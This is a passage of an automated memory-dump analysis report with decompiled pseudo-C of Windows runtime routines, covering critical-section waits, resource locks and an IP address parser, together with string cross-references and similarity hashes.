                                                                                                                                                            											_t42 = E0094F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            											__eflags = _t42;
                                                                                                                                                            											if(__eflags >= 0) {
                                                                                                                                                            												L2:
                                                                                                                                                            												return _t42;
                                                                                                                                                            											} else {
                                                                                                                                                            												_push(_t42);
                                                                                                                                                            												E00993915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                            												_push( &_a4);
                                                                                                                                                            												_push(1);
                                                                                                                                                            												_t42 = E0094F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                            												__eflags = _t42;
                                                                                                                                                            												if(__eflags >= 0) {
                                                                                                                                                            													goto L2;
                                                                                                                                                            												} else {
                                                                                                                                                            													_push(_t42);
                                                                                                                                                            													_t45 = E00993915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                            													asm("int3");
                                                                                                                                                            													while(1) {
                                                                                                                                                            														_t74 = _t45;
                                                                                                                                                            														__eflags = _t45 - 1;
                                                                                                                                                            														if(_t45 != 1) {
                                                                                                                                                            															break;
                                                                                                                                                            														}
                                                                                                                                                            														_t86 = _t86 | 0xffffffff;
                                                                                                                                                            														_t45 = _t74;
                                                                                                                                                            														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            														__eflags = _t45 - _t74;
                                                                                                                                                            														if(_t45 != _t74) {
                                                                                                                                                            															continue;
                                                                                                                                                            														} else {
                                                                                                                                                            															_t46 =  *[fs:0x18];
                                                                                                                                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                            															return _t46;
                                                                                                                                                            														}
                                                                                                                                                            														goto L38;
                                                                                                                                                            													}
                                                                                                                                                            													E00975329(_t74, _t92);
                                                                                                                                                            													_push(1);
                                                                                                                                                            													_t48 = E009753A5(_t92);
                                                                                                                                                            													return _t48;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t32 =  *(_t64 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t71 =  *_t79;
                                                                                                                                                            								__eflags = _t71;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t57 = _t71;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t57 - _t71;
                                                                                                                                                            										if(_t57 == _t71) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t71 = _t57;
                                                                                                                                                            										__eflags = _t57;
                                                                                                                                                            										if(_t57 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t32 = _a4;
                                                                                                                                                            									__eflags = _t71;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L38;
                                                                                                                                                            					}
                                                                                                                                                            					_t71 = _t71 | 0xffffffff;
                                                                                                                                                            					_t32 = 0;
                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            					__eflags = 0;
                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                            						goto L4;
                                                                                                                                                            					} else {
                                                                                                                                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L38:
                                                                                                                                                            			}


























                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x009b228f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b226d
                                                                                                                                                            0x009753cb
                                                                                                                                                            0x009753ce
                                                                                                                                                            0x009753d0
                                                                                                                                                            0x009753d4
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753d8
                                                                                                                                                            0x009753e3
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B22F4
                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009B22FC
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 009B2328
                                                                                                                                                            • RTL: Resource at %p, xrefs: 009B230B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-871070163
                                                                                                                                                            • Opcode ID: b0e2a2f7ffed5b011c28f9dd62406f92a7812c3dc8c00195c2b138f377b2b1c8
                                                                                                                                                            • Instruction ID: 15d4b2e25242f53a4247ddec77f253f6f938b02b6652e7d0b419c09ece645af3
                                                                                                                                                            • Opcode Fuzzy Hash: b0e2a2f7ffed5b011c28f9dd62406f92a7812c3dc8c00195c2b138f377b2b1c8
                                                                                                                                                            • Instruction Fuzzy Hash: 21512A72600701ABEF15DF68CC81FA673DCEF94764F118629FD18DB291E6A1ED418790
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                            			E0097EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				short _v66;
                                                                                                                                                            				char _v72;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                            				signed int _t44;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                            				signed char _t67;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                            				void* _t91;
                                                                                                                                                            				void* _t92;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            
                                                                                                                                                            				_t80 = __edi;
                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                            				_t70 = __ecx;
                                                                                                                                                            				_t84 = _a4;
                                                                                                                                                            				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                            					E0096DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                            					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                            				}
                                                                                                                                                            				_push(0);
                                                                                                                                                            				__eflags = _t38 - 0xffffffff;
                                                                                                                                                            				if(_t38 == 0xffffffff) {
                                                                                                                                                            					_t39 =  *0xa3793c; // 0x0
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(_t84);
                                                                                                                                                            					_t40 = E009516C0(_t39);
                                                                                                                                                            				} else {
                                                                                                                                                            					_t40 = E0094F9D4(_t38);
                                                                                                                                                            				}
                                                                                                                                                            				_pop(_t85);
                                                                                                                                                            				__eflags = _t40;
                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                            					_push(_t40);
                                                                                                                                                            					E00993915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                            					asm("int3");
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L21:
                                                                                                                                                            						_t76 =  *[fs:0x18];
                                                                                                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                            						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                            						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                            							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                            							_v66 = 0x1722;
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_t76 =  &_v72;
                                                                                                                                                            							_push( &_v72);
                                                                                                                                                            							_v28 = _t85;
                                                                                                                                                            							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                            							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(0x10);
                                                                                                                                                            							_push(0x20402);
                                                                                                                                                            							E009501A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t43 = _v8;
                                                                                                                                                            							_push(_t80);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							__eflags = _t43 - 0xffffffff;
                                                                                                                                                            							if(_t43 == 0xffffffff) {
                                                                                                                                                            								_t71 =  *0xa3793c; // 0x0
                                                                                                                                                            								_push(_t85);
                                                                                                                                                            								_t44 = E00951F28(_t71);
                                                                                                                                                            							} else {
                                                                                                                                                            								_t44 = E0094F8CC(_t43);
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t44 - 0x102;
                                                                                                                                                            							if(_t44 != 0x102) {
                                                                                                                                                            								__eflags = _t44;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t44);
                                                                                                                                                            									E00993915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									E009D2306(_t85);
                                                                                                                                                            									__eflags = _t67 & 0x00000002;
                                                                                                                                                            									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                            										_t7 = _t67 + 2; // 0x4
                                                                                                                                                            										_t72 = _t7;
                                                                                                                                                            										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                            										__eflags = _t67 - _t67;
                                                                                                                                                            										if(_t67 == _t67) {
                                                                                                                                                            											E0097EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _v24;
                                                                                                                                                            									if(_v24 != 0) {
                                                                                                                                                            										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                            									}
                                                                                                                                                            									return 2;
                                                                                                                                                            								}
                                                                                                                                                            								goto L36;
                                                                                                                                                            							}
                                                                                                                                                            							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                            							_push(_t67);
                                                                                                                                                            							_t46 = E00994FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                            							_push(_t77);
                                                                                                                                                            							E009A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                            							_t48 =  *_t85;
                                                                                                                                                            							_t92 = _t91 + 0x18;
                                                                                                                                                            							__eflags = _t48 - 0xffffffff;
                                                                                                                                                            							if(_t48 == 0xffffffff) {
                                                                                                                                                            								_t49 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(_t49);
                                                                                                                                                            							_t50 = _v12;
                                                                                                                                                            							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                            							_push(_t85);
                                                                                                                                                            							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                            							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                            							E009A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                            							_t53 =  *_t85;
                                                                                                                                                            							_t93 = _t92 + 0x20;
                                                                                                                                                            							_t67 = _t67 + 1;
                                                                                                                                                            							__eflags = _t53 - 0xffffffff;
                                                                                                                                                            							if(_t53 != 0xffffffff) {
                                                                                                                                                            								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t67 - 2;
                                                                                                                                                            							if(_t67 > 2) {
                                                                                                                                                            								__eflags = _t85 - 0xa320c0;
                                                                                                                                                            								if(_t85 != 0xa320c0) {
                                                                                                                                                            									_t76 = _a4;
                                                                                                                                                            									__eflags = _a4 - _a8;
                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                            										E009D217A(_t71, __eflags, _t85);
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							_push("RTL: Re-Waiting\n");
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0x65);
                                                                                                                                                            							_a8 = _a4;
                                                                                                                                                            							E009A3F92();
                                                                                                                                                            							_t91 = _t93 + 0xc;
                                                                                                                                                            							__eflags =  *0x7ffe0382;
                                                                                                                                                            							if( *0x7ffe0382 != 0) {
                                                                                                                                                            								goto L21;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t40;
                                                                                                                                                            				}
                                                                                                                                                            				L36:
                                                                                                                                                            			}


                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009B24BD
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 009B24FA
                                                                                                                                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009B248D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                            • API String ID: 0-3177188983
                                                                                                                                                            • Opcode ID: d3b53fc1975c46a1dd6f7e8db857e33980db99a23e04a5fe0722f3bdd2f21b26
                                                                                                                                                            • Instruction ID: a2559d575a14255ae1455952f20b5b4d47aa3f11a103e29090c0a3f197c15ee6
                                                                                                                                                            • Opcode Fuzzy Hash: d3b53fc1975c46a1dd6f7e8db857e33980db99a23e04a5fe0722f3bdd2f21b26
                                                                                                                                                            • Instruction Fuzzy Hash: B0412971600204AFDB20DF69CD85FAE77ADEF88720F20CA45F9599B2D1D734E94187A0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0098FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _t105;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				char _t114;
                                                                                                                                                            				short _t115;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				signed short* _t119;
                                                                                                                                                            				short _t120;
                                                                                                                                                            				char _t122;
                                                                                                                                                            				void* _t127;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            				signed int _t136;
                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                            				signed int _t158;
                                                                                                                                                            				signed short* _t164;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				void* _t170;
                                                                                                                                                            
                                                                                                                                                            				_t158 = 0;
                                                                                                                                                            				_t164 = _a4;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_t136 = 0;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                            					if(_t167 == _t158) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					_t118 = _v20 - _t158;
                                                                                                                                                            					if(_t118 == 0) {
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            								_v28 = 1;
                                                                                                                                                            								_v8 = _t143;
                                                                                                                                                            								_t136 = _t136 + 1;
                                                                                                                                                            								L47:
                                                                                                                                                            								_t164 = _t119;
                                                                                                                                                            								_v20 = _t143;
                                                                                                                                                            								L14:
                                                                                                                                                            								if(_v24 == _t158) {
                                                                                                                                                            									L19:
                                                                                                                                                            									_t164 =  &(_t164[1]);
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v12 == _t158) {
                                                                                                                                                            									if(_v16 > 4) {
                                                                                                                                                            										L29:
                                                                                                                                                            										return 0xc000000d;
                                                                                                                                                            									}
                                                                                                                                                            									_t120 = E0098EE02(_v24, _t158, 0x10);
                                                                                                                                                            									_t170 = _t170 + 0xc;
                                                                                                                                                            									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                            									_t136 = _t136 + 1;
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v16 > 3) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								_t122 = E0098EE02(_v24, _t158, 0xa);
                                                                                                                                                            								_t170 = _t170 + 0xc;
                                                                                                                                                            								if(_t122 > 0xff) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L21:
                                                                                                                                                            						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(E0098685D(_t167, 4) == 0) {
                                                                                                                                                            								if(E0098685D(_t167, 0x80) != 0) {
                                                                                                                                                            									if(_v12 > 0) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t127 = 1;
                                                                                                                                                            									_a7 = 1;
                                                                                                                                                            									_v24 = _t164;
                                                                                                                                                            									_v20 = 1;
                                                                                                                                                            									_v16 = 1;
                                                                                                                                                            									L36:
                                                                                                                                                            									if(_v20 == _t127) {
                                                                                                                                                            										goto L19;
                                                                                                                                                            									}
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v24 = _t164;
                                                                                                                                                            							_v20 = 1;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							goto L19;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t130 = _t118 - 1;
                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                            						if(_t130 == 1) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						}
                                                                                                                                                            						_t127 = 1;
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t167 >= 0x80) {
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									L13:
                                                                                                                                                            									_v20 = _t158;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v28 != 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_v28 = _v8 + 1;
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								_v8 = _v8 + _t143;
                                                                                                                                                            								goto L47;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(E0098685D(_t167, 4) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					if(E0098685D(_t167, 0x80) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						if(_v12 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_a7 = 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					goto L7;
                                                                                                                                                            				}
                                                                                                                                                            				 *_a8 = _t164;
                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                            					if(_v12 != 3) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _v8 + 1;
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                            					if(_v20 != 1) {
                                                                                                                                                            						if(_v20 != 2) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            						L65:
                                                                                                                                                            						_t105 = _v28;
                                                                                                                                                            						if(_t105 != 0) {
                                                                                                                                                            							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                            							E00968980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                            							_t110 = 8;
                                                                                                                                                            							E0095DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                            						if(_v16 > 3) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						_t114 = E0098EE02(_v24, 0, 0xa);
                                                                                                                                                            						_t170 = _t170 + 0xc;
                                                                                                                                                            						if(_t114 > 0xff) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                            						goto L65;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v16 > 4) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_t115 = E0098EE02(_v24, 0, 0x10);
                                                                                                                                                            					_t170 = _t170 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                            					goto L65;
                                                                                                                                                            				} else {
                                                                                                                                                            					goto L29;
                                                                                                                                                            				}
                                                                                                                                                            			}

























                                                                                                                                                            0x0098fd6e
                                                                                                                                                            0x0098fd6e
                                                                                                                                                            0x0098fd71
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd71
                                                                                                                                                            0x0098fd4a
                                                                                                                                                            0x0098fd21
                                                                                                                                                            0x0099a3a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0099a3a1
                                                                                                                                                            0x0098fd36
                                                                                                                                                            0x009a200b
                                                                                                                                                            0x009a2012
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a2018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a2018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0098fd36
                                                                                                                                                            0x0098fe0f
                                                                                                                                                            0x0098fe16
                                                                                                                                                            0x0099a3ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0099a3b3
                                                                                                                                                            0x0099a3b3
                                                                                                                                                            0x0098fe1f
                                                                                                                                                            0x009bed25
                                                                                                                                                            0x009bed86
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed91
                                                                                                                                                            0x009bed95
                                                                                                                                                            0x009bed95
                                                                                                                                                            0x009bed9a
                                                                                                                                                            0x009bedad
                                                                                                                                                            0x009bedb3
                                                                                                                                                            0x009bedba
                                                                                                                                                            0x009bedc4
                                                                                                                                                            0x009bedc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bedcc
                                                                                                                                                            0x009bed2a
                                                                                                                                                            0x009bed55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed61
                                                                                                                                                            0x009bed66
                                                                                                                                                            0x009bed6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed7d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed7d
                                                                                                                                                            0x009bed30
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bed3c
                                                                                                                                                            0x009bed43
                                                                                                                                                            0x009bed4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3965848254-0
                                                                                                                                                            • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                            • Instruction ID: dcec933bcb0858312c8e691b9d01a731636981f80a051a1de2d584206f4bafbf
